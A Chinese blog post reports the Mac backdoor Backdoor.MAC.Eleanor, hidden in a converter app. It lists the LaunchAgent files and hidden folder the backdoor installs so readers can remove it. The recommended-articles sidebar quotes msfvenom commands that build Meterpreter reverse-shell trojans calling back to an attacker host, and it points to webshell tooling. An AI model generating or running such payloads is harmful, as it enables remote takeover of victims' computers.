OSX:发现最新OSX木马 !!!

最新推荐文章于 2020-03-23 14:28:00 发布
最新推荐文章于 2020-03-23 14:28:00 发布
阅读量2.5k 收藏
点赞数
分类专栏: Mac OS X安全 技术 Mac OS X实用技巧 教育相关 OSX
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cneducation/article/details/51850321
版权

是由Bitdefender发现的,被其称为:Backdoor.MAC.Eleanor

该木马是附在一个免费下载软件中的,该软件是从MacUpdate网站下载的叫做“EasyDoc Converter”的,该软件功能是可以转化各种格式的文档到MS Word的格式。

该软件最初运行时会首先检测Little Snitch是否安装,如果没有,就会安装木马,木马是运行在用户环境中的,它不依靠掌握root权限,因为它只想盗取用户信息。

它安装三个用户环境服务配置以及一个隐藏文件夹(.dropbox),所有的木马程序都保存在该隐藏目录下:

/Users/username/Library/LaunchAgents/com.getdropbox.dropbox.integritycheck.plist
/Users/username/Library/LaunchAgents/com.getdropbox.dropbox.timegrabber.plist
/Users/username/Library/LaunchAgents/com.getdropbox.dropbox.usercontent.plist
/Users/username/Library/.dropbox/

所以该木马的删除相对简单。或者使用免费的Anti-Malware for Mac也可以删除。


Bitdefener的全文参见;https://labs.bitdefender.com/wp-content/uploads/2016/07/Backdoor-MAC-Eleanor_final.pdf

和其blog: https://labs.bitdefender.com/2016/07/new-mac-backdoor-nukes-os-x-systems/



afatgoat
关注
专栏目录
Msfvenonm生成一个后门木马
墨鱼菜鸡
11-08 429
在前一篇文章中我讲了什么是Meterpreter,并且讲解了Meterpreter的用法。传送门——>Metasploit之Meterpreter 今天我要讲的是我们用Msfvenom制作一个木马,发送给其他主机,只要其他主机运行了该木马,就会自动连接到我们的主机,并且建立一条TCP连接。我们可以通...
木马终端】————1、中国蚁剑的使用与功能介绍
Fly_鹏程万里
08-08 1万+
前言 说起webshell终端管理工具大多数人都会说“中国菜刀”,确实“中国菜刀”伴随着我们一起在网络安全道路上走了好久好久,它算的上是webshell终端管理工具的“启蒙导师”。今天给大家要介绍的是一个功能更加强大而且好用的webshell终端管理工具——中国蚁剑。 下载 中国蚁剑的项目地址:https://github.com/AntSwordProject/antSword ...
Mac木马病毒再现(OSX/Crisis)
系统运维
07-27 516
正当我们翘首期待新版Mac OS X美洲狮10.8的发布,并为它而欢欣鼓舞,忙于下载/安装/测试的时候,在网络安全界却传来了又一个不幸的消息,一个新的Mac病毒被监测到。 这个由Intego公司首先监测到并分析和发布一些具体细节的病毒,同以往的有这很大的不同,比如上次的那个"闻名于世"的闪回(FlashBack),这个病毒并不需要用户的干预,其实,它是默默地在用户无从察觉中感染电...
Mac: 再现木马
中国在线教育
10-28 1589
Mac: 再现木马<br />它被发现并被称作,trojan.osx.boonana.a,他可以传染现在主流的Mac OS X系统,该病毒目前通过各种社交网络,以一个叫做"Is this you in this video?"的连接形式传播。<br /> <br />这个连接是一个Java程序,它包含传染Windows和Mac系统的代码,以前有有关在Windows版本的传染报道,不过现在他已经包含了Mac的代码。在Mac上,它会下载Java程序,Java会提示如下提示,而如果你认可,该Java程序可以通过这
又一个Mac特洛伊木马发现!苹果用户要警惕
轻轻草原
07-26 776
Mac电脑安全公司Intego最近发现了一个针对“雪豹”和“狮子”的Mac OS X系统木马,安全研究人员将其命名为“OS/X Crisis”。这个恶意软件是一种植入式的木马病毒,他通过自身的一系列恶意代码把自己伪装成游戏、屏保甚至是音乐文件。这种木马会在没有通知用户的情况下自动安装,并把自己的行踪掩盖起来。其安全研究员Lysa Myers指出:“这种类型的病毒并不常见,它会极力把自己掩藏...
trojan-1.14.1-macos.zip
03-19
trojan-1.14.1-macos命令行客户端,运行界面进行上网认证,不受版本影响!版本为004a版本中的其中一项
!!! 严重OS X 木马警告
chengyixian7877的博客
03-09 57
严重OS X 木马警告:在1月22日Intego公布发现最新的他们命名为OSX.Trojan.iServices.A的木马,它被分级为“严重”,这个木马随着网上好多可以下载的iWorks 09的安装,自动安装在系统里。 Intego报告说已经又20,000个用户下载了这个带毒的版本。下面是手...
osx.raedbot.rar_At Risk_OSX.Raedb_linux trojan_realbasic_xraed
最新发布
09-21
标题中的"osx.raedbot.rar_At Risk_OSX.Raedb_linux trojan_realbasic_xraed"揭示了这个压缩包文件包含的是一种针对多个平台的蠕虫木马病毒,特别是针对Windows 32位系统、Linux以及Mac OS。关键词“Cross-Platform...
Trojan for Mac
04-02
Trojan for Mac 支持 macOS Catalina 10.15.3 最好用的 Mac Trojan 客户端.
msfvenom生成木马利用
zzlx123的博客
12-23 2287
一开始想着把自己的物理主机当作靶机来执行木马,奈何发现不能从kali拖拽文件,所以先处理了下Tools的问题。 在安装Tools的时候提示CD-ROM门锁定,如果有和我一样问题的朋友可以按照我的方法来解决。 0x00 关闭kali 0x01 点击编辑此虚拟机 0x02 将此处改为使用物理驱动器 0x03 再次开启虚拟机,等开启后选择安装Tools 0x04 他会自动进行安装,进入系统后打开文件...
利用msf框架生成常见的木马
weixin_42035825的博客
03-23 1836
常用木马 安卓app msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPOR=8888 -o test.apk Linux: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ip LPOR=8888 -f elf>shell.elf Mac: msfvenom -p osx/x...
三个小命令检查你的电脑是否被安装木马
wujizhishui的博客
12-24 479
1. 检测网络连接 nerstat -an: 可以看到所有和本地计算机建立连接的IP 包含四个部分 proto(连接方式) local address(本地连接地址) foreign address(和本地建立连接的地址) state(当前端口状态) 2. 禁用不明服务 net stop server 3. 轻松检查账户 net
苹果笔记本中挖矿木马
Inkbamboo专栏
08-03 5716
苹果笔记本中挖矿木马mac笔记本的主要表现使用ps -ef|grep osascript查看进程以下部分为引用博客部分内容:启动挖矿Domain mac笔记本的主要表现 活动监视器无法打开 cpu稳定保持被一个osascript的进程较高占用 每次笔记本开机之后该都会是上述现象 杀掉osascript之后,活动监视器就恢复正常 本博客大部分信息来源于:http://www.mamicode.c...
Mac OS X:单用户模式(Single User Mode)的操作和安全漏洞
热门推荐
中国在线教育
02-02 3万+
Mac OS X:单用户模式(Single User Mode)的操作和安全漏洞Update:2009-02-17: 在“1:检查修复磁盘”后面添加了:磁盘检查正常和错误的判断,以及如果碰到错误的应对方法。 简介:    本文力图简单明了地叙述单用户模式的进入和使用,有关基本的操作命令和用途,和常用的应用工具。并且简单叙述NetInfo和dslocl的多用户管理架构,同时涉及OS
Mac: 账户失去了管理员权限,怎么办?!网上流行的和没见过的都在这里。
中国在线教育
11-17 2万+
扯闲篇 的确可以把一个普通用户变回(为)管理员,而且并不难,只要是可以接触到你的Mac,并重新启动一次就可以。熟练的话,也就1分钟左右就可以办到。往下看跟这我的步骤操作,就知道多简(复)单(杂)了。 您肯定会想:是不是任何一个普通帐户都可以变成管理员啊?!但是,难道这不是一个安全漏洞吗? 答案是:可以。不过本人不认为这是安全漏洞,这是系统的用户管理的一种方式而已。 出于安全考虑,能否防止? 答案是...
OSX: diskutil命令-转换成自由空间并再对其分区
中国在线教育
07-19 1万+
声明:本文涉及的操作很可能会破坏你的系统文件,造成数据丢失,请慎重模仿,一切后果作者均不承担任何责任。 因为有时需要对磁盘分区进行操作,那么在前端使用磁盘工具比较方便,而且不容易出错。可是有时需要远程或者通过诸如ssh来处理,特别是对多个机器同时操作的情况下,总不能显得自己那么的笨手笨脚的吧。每个公司甚至是每个办公室,总有那么一个人难对付,那老兄要求帮忙,顺便给你来一句:要是给我管理员权限,这个我在家经常做。他不就是觉得自己牛逼嘛,你会的他也会,看不起咱么。如果不让他领教一下厉害,就让他抓住把柄了还!再说,
Mac的固件密码能被破解吗?
中国在线教育
06-30 1万+
固件密码可以用来保护你的Mac的安全 能不用通过苹果也不用密码能重置这个密码嘛? 通过修改一个芯片的代码来重置该密码? 哈哈,原来可能这个固件密码依然的可以被软解的? 最后的结论也让人吃惊不已
OSX Yosemite:融合与统一的新里程碑
"融合与统一:简评OSX10.10Yosemite" 苹果的OSX10.10Yosemite是苹果操作系统发展历程中的一个重要里程碑,它标志着苹果对其桌面和移动平台融合策略的进一步推进。OSX和iOS的发展速度原本存在显著差异,iOS的快速...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值